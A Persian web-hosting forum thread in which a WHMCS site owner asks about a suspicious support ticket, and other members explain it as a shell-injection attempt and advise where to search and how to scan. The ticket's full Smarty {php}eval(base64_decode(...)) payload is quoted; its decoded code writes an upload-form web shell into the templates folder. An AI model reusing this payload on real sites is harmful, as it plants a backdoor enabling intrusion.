کمک کمک .. یک مورد مشکوک در تیکت

[Afsarie]

با سلام خدمت دوستان . امروز توی قسمت تیکت ها دیدم یک نفر تیکت زده و اینو نوشته توی تیکت .. میخواد هک کنه ؟ هک کرده ؟
هم موضوع رو این زده هم خود متن تیکت رو..
این چیه ؟

#615816 - {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

[softlayer]

سلام
هاستتو بگرد
تمام دایرکتوری ها
فایل مشکوک دیدی حذف کن
کل base64 برای تزریق شل به داخل سایتتونه

موفق باشید

[Afsarie]

فایل های مشکوک با فرمت چی ؟
فرمت های php هم جزو فایل های مشکوکه ؟
Base64 کجاست ؟

[softlayer]

فرمت فایل ها .php هستش
داخل دایرکتوری downloads و atachments بگرد
یه شل اونجا قرار میدن
فایلهای مورد نیازشون رو آپلود میکنند رو هاستت

[saman19-6]

سلام .خوبی ؟ ببین این فایل کد شده (base64) هست .معمول شل ها رو بصورت کد شده میفرستن .حالا به فرمت txt php .اولا که احتمال ارسالش بنظر کم میباد .اما برای اسکن

یعنی هر جای هاست (هر فولدری ) با هر پسوندی .. فایل کد شده ای دیدی (فرمتش مثل همین ایمیلت بود حروف کد شد ) اون میتونه فایل مشکوک تلقی بشه.ولی فولدر های که دوستمون گفتن اولین مکان بررسی میتونه باشه چون معمولا اینطور جاها میریزن

[Afsarie]

فرمت فایل ها .php هستش
داخل دایرکتوری downloads و atachments بگرد
یه شل اونجا قرار میدن
فایلهای مورد نیازشون رو آپلود میکنند رو هاستت

البته این 2 تا فولدر + template+c رو به قبل از public_html انتقال دادم طبق آموزش نصب Whmcs در همین انجمن .
اما توی این فولدر ها هم چیزی نبود جز index که از اولم بود..جای دیگه ای هم هست که باید بگردم ؟

سلام .خوبی ؟ ببین این فایل کد شده (base64) هست .معمول شل ها رو بصورت کد شده میفرستن .حالا به فرمت txt php .اولا که احتمال ارسالش بنظر کم میباد .اما برای اسکن

یعنی هر جای هاست (هر فولدری ) با هر پسوندی .. فایل کد شده ای دیدی (فرمتش مثل همین ایمیلت بود حروف کد شد ) اون میتونه فایل مشکوک تلقی بشه.ولی فولدر های که دوستمون گفتن اولین مکان بررسی میتونه باشه چون معمولا اینطور جاها میریزن

تشکر از توضیحات مختصر و مفیدتون . چطوری باید بفهمم که فایلی کد شده هست یا خیر ؟ چون عرض کردید هر جای هاست (هر فولدری) با هر پسوندی اگر کد شده بود مشکوکه ..
شرمنده من یک مقداری مبتدی هستم توی این مسائل و هی شمارو به زحمت میندازم

[saman19-6]

خواهش میکنم .ماهم از شما مبتدی تر . والا معمولا با یک شل اسکنر (که بروی سرور نصب میکنند حال از نوع پولی مثل cxs و یا اسکنر های رایگان ) سیستم رو اسکن میکنند.

اگر اینها رو ندارید . البته یک روش دیگری هم هست که خیلی کامل نیست و اما ضرری نداره اونم یک اسکنر ساده php هست که هاستو اسکن میکنه و فایلها مشکوک و base64 رو بشما نشون میده .
اگر خواستین ایمیل بدین بفرستم . البته 2تا مشکل داره
1.یکی اینکه امکان داره 7 8 فایلو مشکوک تلقی کنه در صورتی که مشکلی ندارن این فایلا ( دستی باید فایلا رو چک کنید )
2.اگر هم از فایلی ایراد نگرفت دلیل بر 100 عدم وجود شل نیست .. ولی تا 70% شل ها رو بعنوان مشکوک شناسایی میکنه

البته بازهم بهترین روش نصب اسکنر بروی سرور میباشد

[Afsarie]

اگر ایمیلتون رو برام پ.خ کنید باهم توی یاهوو در ارتباط باشیم عالیه

[softlayer]

البته این 2 تا فولدر + template+c رو به قبل از public_html انتقال دادم طبق آموزش نصب Whmcs در همین انجمن .
اما توی این فولدر ها هم چیزی نبود جز index که از اولم بود..جای دیگه ای هم هست که باید بگردم ؟

کار خوبی کردید
خیر فایل های قابل نوشتن همینا هستن
attachments
downloads
templates_c

اکثر سی پنلها قابلیت ویروس کشی دارند
از اون هم استفاده کنید خوبه

موفق باشید

[Afsarie]

با تشکر از همه . مشکل با راهنمایی دوستان عزیزم حل شد .